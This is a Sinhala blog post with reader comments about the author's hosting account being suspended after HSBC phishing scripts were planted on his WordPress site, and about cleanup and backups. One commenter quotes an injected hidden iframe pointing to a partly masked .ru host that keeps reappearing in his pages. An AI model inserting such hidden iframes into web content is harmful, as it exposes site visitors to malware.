හපොයි ! මට හරි බාල්දියක් පෙරලුනා නෙව. (මට දැං මේව කියන්නත් කම්මැලියි. මේ මගේම ඩොමේනයට ගිය දවසෙ ඉඳන් මට බාල්දි. ඕවා ලියලා දැං තමුන්නාන්සේලාට කියවලත් එපා වෙලා ඇති. කමක් නෑ මේකත් කියවන්නකෝ)
පෙරේදා රෑ වෙලා ට්වීට් එකක් ආවා “මචන් උඹේ බ්ලොග් එකට යන්න බෑ නෙ” කියලා. ඕක දැක්කාම මට හිනා ගියා. මොකද මම අර මුලින් කිව්ව බාල්දි වලින් එකක් තමා ඕක, හැමදාම මොකක්හරි ISP කෙනෙකුගේ DNS සමග මගේ බ්ලොග් එක කචල් දාගන්නවා. දවසකට ඩයලොග් වලින් යන්න බෑ, දවසකට මොබිටෙල් වලින් යන්න බෑ. ඒ නිසා මම ඕක ගණං ගත්තෙ නෑ. ටික වෙලාවකින් මම නිකං ගියා බ්ලොග් එක පැත්තට. හුටා ! එන්නෙ බ්ලොග් එක නෙමෙයි අනතුරු හැඟවීමක්.
Your Account Has Been Suspended !
මගේ හොස්ටිං එකවුන්ට් එකට හිඟ ගෙවීමකුත් නෑ. මම Terms of Service එකට විරුද්ධ වැඩක් කලෙත් නෑ. එහෙනං ඇයි මේ? මම ඉක්මනටම ලිව්වා කස්ටමර් සර්විස් එකට. ටික වෙලාවකින් ආපු රිප්ලයි එකට මට දෙලෝ රත් උනා. ඇමරිකාවේ HSBC බැංකුව රිපෝට් කරලා තියෙනවලු indranama.com සයිට් එකෙන් උන්ට phishing attack එකක් ආවා කියලා. අදාල ස්ක්රිප්ට් 2 නම් තිබුනා. ඒවා මම ජීවිතේට අප්ලෝඩ් කලේ නැති ඒවා. ඔන්න ඉතිං හොස්ටිං කොම්පැනිය මට හෙන හෙන සද්ද දාන්න ගත්තා. හැකිං වැඩ වලට උන්ගෙ සර්වර් පාවිච්චි කරන්න එපාලු, ටෙස්ටිං වැඩ කරන්න ඕනෙ නං ෆ්රී හොස්ට් එකක් හොයාගන්නලු. මම කිව්වා දෙයියනේ හැක් කරන්න ඕනෙ නං මම මගේ සම්පූර්ණ පැටිකිරියම තියෙන සයිට් එක හරහා කරනවයැ. වෙන කොහේහරි ෆ්රී එකකින් කරනවා මිස. මම කිව්වා මාව හැක් කරලා වෙන්නැති, ඉතිං මට සද්ද දාන්නෙ නැතුව malicious script ටික අයිං කරගන්න මට උදව් කරන්න කියලා. (මම ඒ ස්ක්රිප්ට් වල නම් ගූග්ල් එකෙන් ඇහුවාම පෙනුනා ඒවා HSBC එකට කෙලින්නම හදපු ඒවා බව, ප්රසිද්ධ phishing attack එකක්).
ඊලඟට හොස්ටිං කොම්පැනිය කියනවා මගේ ස්ක්රිප්ට් වල (මම ස්ක්රිප්ට් වලට පාවිච්චි කරන්නෙ වර්ඩ්ප්රෙස් විතරයි) security vulnerabilities ඇතිලු. ඒවායින් වෙන්නැතිලු හැකර්ලා රිංගන්නෙ. ඒවා චෙක් කරන්නලු. මමලු ඒවාට වග කියන්න ඕනේ. මම කිව්වා මම පාවිච්චි කරන්නේ ලෝක ප්රසිද්ධ වර්ඩ්ප්රෙස් අලුත්ම වර්ෂන් එක, දන්න තරමින් එහි සෙකියුරිටි ප්රශ්න නෑ, ස්ක්රිප්ට් එකින් එක debug කර කර security holes බලන්න තරම් දැනුමක් මට නෑ, මම CISCO වත් CEH කෙනෙක් වත් නෙමේ කියලා.
කොහොමින් කොහොමින් හරි ඊයෙ දවස පුරාම වාද කරලා අද උදේ පාන්දර මට එකවුන්ට් එක නැවත ලැබුනා. දැං නැවතත් බ්ලොග් කරණයේ යෙදෙන්න පුලුවන් අවුලක් නැතුව. පාන්දරින්ම කලේ ftp ලොග් වෙලා අර malicious script ටික මකලා දාලා ftp හා cPanel එකේ පාස්වර්ඩ් වෙනස් කරපු එක. ඒත් මම හිතන්නෙ නෑ පාස්වර්ඩ් එකෙන් රිංගන්න ඇති කියලා. එක්කො වර්ඩ්ප්රෙස් ෆයිල් එකක සිදුරක්. නැත්තම් ඒ සර්වරය ඇතුලෙ තිබ්බ මැල්වෙයා එකකින් තමා මගේ ෆයිල් වලට ඇවිත් වැඩේ දීල තියෙන්නෙ.
කොහොම වෙතත් තමන්ගෙම හොස්ටිං ස්පේස් පාවිච්චි කරන අයට මේවා හොඳ පාඩම්. මට නම් මේක හොඳ අත්දැකීමක් උනා. හැබැයි බයවෙලා හිටියේ එකවුන්ට් එක ආයෙ ලැබෙන්නෙ නැතිවෙයි කියලා. ආපහු වෙන හොස්ට් එකක් අරං (සල්ලිත් නෑ මේ දවස්වල) වර්ඩ්ප්රෙස් දාගෙන සෙටිංස් හදන්න එපායැ. මේ වගේ වෙලාවක තමන්ගෙ වර්ඩ්ප්රෙස් ඩේටාබේස් එක ආයෙ ගන්න බැරිඋනොත් එහෙම මොකද කරන්නෙ?? අන්න ඒ වෙලාවට (නෙමෙයි ඊට කලින් දාලා තියන්න ඕනේ !) තමා WordPress Database Backup කියන ප්ලගින් එක වැදගත් වෙන්නේ ! මගේ යාලුවා නම් මාව බෑන් කරපු දවසෙ උදේ ඩේටාබේස් එකත් මට ඊමේල් කරලා තිබුනා.
එහෙනං අපි ගිහින් එන්නං, ඉක්මනටම, තව පෝස්ට් එකක් සමග.
සැලකිය යුතුයි
මාත් මේ හොස්ටින් ස්පේස් එකක් ගැන හිත හිතා හිටියෙ, දැන් නම් බයේ බෑ!
ඉතින් ඔය වගේ attack එන්නෙ හොස්ට්ගේ security වල වැරැද්දක් නිසා නෙවේද? Attack එක කළේ අපි නෙවෙයි කියලා දැනගන්න සාක්ෂියක් හොස්ට් ළඟ නැද්ද?
උන්ට දැනගන්න පුලුවන්. මොකද අපි අප්ලෝඩ් කරන ෆයිල් ලිස්ට් එක උන් ලඟ තියෙනවනේ.
මෙතනදි මේකයි වෙන්නේ.
මම ගත්තෙ ශ්රී ලාංකික reseller කෙනෙක්ගෙන්. උන් ගන්නෙ USA Data Center එකකින්. පොඩි අවුලක් ගිය ගමන් USA එවුන් කරන්නේ මුන්ට සද්දෙ දාන එක. මුන්ව ප්රෙස් කරන්න හදන එක. එතකොට මුන් අනිත් පැත්තට මාව ප්රෙස් කරන්න හදනවා. අන්තිමට මෙයාලම ඒ බව පිලිගත්තා.
හැක් කරා කියන එකෙන් අදහස් වෙන්නේ උන්ගෙ සෙකියුරිටි එකේ අඩුවක් බවනේ. උන් ඒක පිලිගන්න කැමති නෑ. ඒකයි clientලා ව ප්රෙස් කරන්න හදන්නේ.
මෙන්න බෝල මාත් බය කරනවා නෙව මටත් එකක් ගන්න හිතං ඉන්නකොට! තිමීරගේ ප්රශ්ණයට උත්තර දෙන්නකෝ!
අර අනාගතයේ කතාවක් ඒකට පස්සේ ඇමෙරිකාවෙන් ඔබතුමාට එල්ල කළ තර්ජනයක් නෙමේ කියලා ෂුවර්ද?
මටත් ඔහොම අවුලක් උනා එක පාරක්..ප්ලගින් එකක තිබුන ස්ක්රිප්ට් එකක් අවුල් කියල එක Suspended කරල තිබුන දවස් 2ක්..ඒ අවුල නිසා එයාලගෙ CPU එකෙන් 60%ක් විතර ගන්නවලු මම සමහර වෙලාවට,එතකොට සර්වර් එකේ තියෙන අනික් ඔක්කොම සයිට් ඩවුන් ලු..(ලූප් එකක් දුවනව ඇති කියල තමයි අනුමාන කළේ..ඒත් මම දාල තිබුන හැම ප්ලගින් එකක්ම දහස් ගනනක් දෙනා පාවිච්චි කරන ඒව!)..
අවුල කොහෙද කියල හරියටම හොයාගන්න විදියක් තිබ්බෙත් නෑ..අලුතෙන් ඔක්කොම මාරු කරන්න උනා ඉතින්..
ඕකුන්ගෙ වැරැද්දක් තමා. ලංකාවෙ වගේම තමංගෙ වැරැද්ද වහ ගන්නයි හදන්නෙ..
කොහොම උනත් ආපහු ලැබුන එක ලොකු දෙයක්. උන්ටම තේරෙන්න ඇති බිස්නස් නැතිවෙන සීන් එකක් සෙට් වේගෙන එන විත්තිය.
(ඔන්න චාන්ස් එක.. කලු ලියුම් කරන්න. අවුරුද්දක් ෆ්රී දුන්නෙ නැත්තං හැක් කලා කියල කියනව කියල.. හික් හික්, අතුරු ප්රතිඵල වලට වග කියනු නොලැබේ)
කරදර බාධක කාටත් උරුමයි… සැලෙන්නැතුව ඔහොම යාං…….
මට ඒ script දෙක තියෙනවා නම් email කරන්න පුළුවන්ද?
<iframe src=’http://**b.ru:8080/index.php’ width=160 height=155 style=’visibility: hidden’>
මෙන්න මට වද දෙන එක හිඩ්න් ෆේම් එකක් මේවගේ එකක්ද ආවේ. මේක කොච්චර අයින් කරත් ආයිම එනව. පාස්වර්ඩ් මාරු කරාම නම් අවුලක් නෑ හැබැයි අනිත් සවර්ස් ටිකටත් දැන් ගිහින්.
මේක අවුලකට හේතු නොවෙයි කියල ප්රාර්ථනා කරනවා & gt & lt දාල තමයි මෙතන දාන්නෙත්
මචං මම URL එක නං ටිකක් එඩිට් කලා.. ඒක හයිපර්ලින්ක් වෙලා තිබ්බ නිසා. අවුලක් නෑ නේ?
නෑ මචන්.. මට වුනේ මගේ දැන් තියෙන පේජ් වලට එකතු වීමක් නෙමේ. මගේ හොස්ට් එක ඇතුලෙ /index කියල ෆෝල්ඩරයක් ඇතුලෙ html ෆයිල් එකක් තිබුනා. ඒක මම හිතන්නේ HSBC බැංකුවේ Online Transaction එකක් කරන පේජ් එකක් විදියටම හදපු එකක්. අන්දලා information ගන්න පුලුවන්නේ.
අවුලක් නෑ! මගේ වෙන්නෙ index.htm home.htm කියන ෆයිල් වල Body ටැග් එකට පස්සේ ඔය ෆේම් එක හරි වෙන එකක් හරි ඇඩ් වෙන එක GalleLinux එකටත් දැං ඕක ඇවිත් නවත්තගන්න විදිහක් හොයාගන්න ඕන.
මාර සීන් රක. ඔයින් ගියා ඇති. ඔය සිද්දි ය වෙන්න කලින් සයිට් එකට ආපු අයගේ ip ටික හොයාගන්න බැරිද? කවුරු හරි හැක් කලා නම් අනමාන කරන්න පුලුවන්නෙ. හැබැයි ඉතිං හෙන ගේමක්.
ඈදපන් මචෝ ලෙඩේ. උන් උබට කියන්නෙ නෑතුවනෙ site එක block කලේ. එ සම්බන්ධයෙන් e-mail මුකුත් එව්වෙත් නෑ නේද? උබ කියපුවම නේද උබව accuse කලේ hsbc එකට hack කරන්න හෑදුව කියලා? කියපන් අහින්සක උබව නොකල වරදකට වෑරදිකාරය කරන්න හෑදුව කියලා.(innocent until proven guilty) කියපන් උබේ පාථකයන් අපහසුතාවයට පත් උනා කියලා. අහපන් උබ ඔච්චර චූදිතයෙක් නම් ඈයි e-mail කරලවත් ඈහුවෙ නෑත්තෙ කියලා. ඕක අනිවා උන්ගෙ අවුලක්. අඩුම ගානෙ අවුරුද්දක් දෙකක්වත් free hosting ඉල්ලපන්. පහත් තෑනින් යයි ගලා ජලේ සෙල්ලම් දාන්න දෙන්නෙපා ඔවුන්ට.
එල එල මචන්. ගේමක් දෙන්න ඕනේ. ලොකු සද්ද දාලා තමා මෙච්චරවත් ඉක්මනට ආයෙ ඇක්ටිව් කරගත්තේ.
මම දැනට IP address ලිස්ට් එක ඉල්ලලා තියෙන්නේ මගේ සයිට් එකට ලොග් උන.
–
නිකං දුන්නත් මෙයාලගේ හොස්ටිං එක මේ අවුරුද්දෙන් පස්සෙ පාවිච්චි කරන්න අදහසක් නෑ බං. නිතරම මෙයාලගේ සර්වරේ එක්ක DNS කචල් යනවා. ගොඩක් දවස්වලට ඩයලොග් හරි මොබිටෙල් හරි වලින් බ්ලොග් එකට යන්න බෑ කියල පැමිණිලි එනවා.
ආ ආ ආ… එළ එළෝ….
මේ ගැන සාකච්ඡාවක් ඇති වුණ එක හොඳයි. අද ඉන්ද්රනාමට සිද්ධ වුණ දේ හෙට තවත් කෙනෙකුට වෙන්න පුළුවන්. ඒත් දැන් අපි දන්නවා අවස්ථානුකූලව හැසිරිය යුතු අන්දම. මම ඉංග්රීසි භාෂාවෙන් ලියන බ්ලොග් අඩවියෙ මේ සිද්ධිය ගැන ලිපියක් ලියනවා.
උඹේ බ්ලොග් එකට ගොඩාක් කනෙක්ෂන් වලින් යන්න බෑ. Airtel කොහෙත්ම බෑ. කලිං SLT. mobitel වලත් පැය ගානකට පස්සේ page එක ලෝඩ් වෙනව . දැනුත් මේ page එක තාම ලෝඩ් වෙනව වෙනව ඉවරයක් නෑ. කමෙන්ට් එකක් දැම්මට ඒකවත් submit වෙන්නෙ නෑ. කැම්පස් එකෙන්වත් මේකට එන්න බැරිඋනා. ඔයා wordpress ඇරෙන්න වෙන කිසි දෙයක් දාලා නැති නිසා මට හිතෙන්නේ hosting අයගේ වැරැද්දකින් වෙච්ච දෙයක් ඔයාගේ කරපිටින් යවනව වෙන්න ඇති. self hosted wordpress පාවිච්චි කරන එකම කෙනා උඹ නෙවෙයිනේ.
proxy එකක් හරහා ඇවිල්ලාවත් comment එක දාගන්න බැරි උනා. ඔන්න ඉන්දරේට බලය දෙනවා මගේ නමින් කමෙන්ට් එක දාන්න.
–
This comment was added by me on behalf of Pahan -Indare
මගේ බ්ලොග් එකේ ගොඩක් ලෙඩ තියෙන බව මම දන්නවා. ඒත් මේ ගත්ත හොස්ටිං එක පාවිච්චි කරන්නත් එපායැ. හැකි ඉක්මනින් හොඳ හොස්ට් එකකට ගිහින් හොඳ සර්විස් එකක් දෙන්නයි බලාපොරොත්තුව.
හදිස්සියේ කමෙන්ට් කරගන්න බැරුව, ඒත් කමෙන්ට් එක අනිවාර්යයෙන්ම දාගන්න ඕනේ නම් indranama@gmail.com මගේ ලිපිනයට එවන්න. මම එය කිසිදු වෙනස්කමක් සිදු නොකොට (කුණුහරුප නොතිබ්බොත්) ඔබේ නමින් පල කරන බවට පොරොන්දු වෙනවා.
ජය වේවා ඉන්දරේ, මම චන්දරේ අපේ අයියා අන්දරේ, නොසැලී ඉදිරියටම යමු අපි ඉන්නව උබත් එක්ක
ගනන් ගන්න එපා
ඕවා ඕහොම තමයි ගෙවල් දොරවලුත් නැති භංගස්තාන වෙන එකේ ඔවා මොනාද ඉතින්
දැන් නම් වැඩේ හරි වගේ. මං hosting කාරයට බැනපු නිසාවත්ද? :D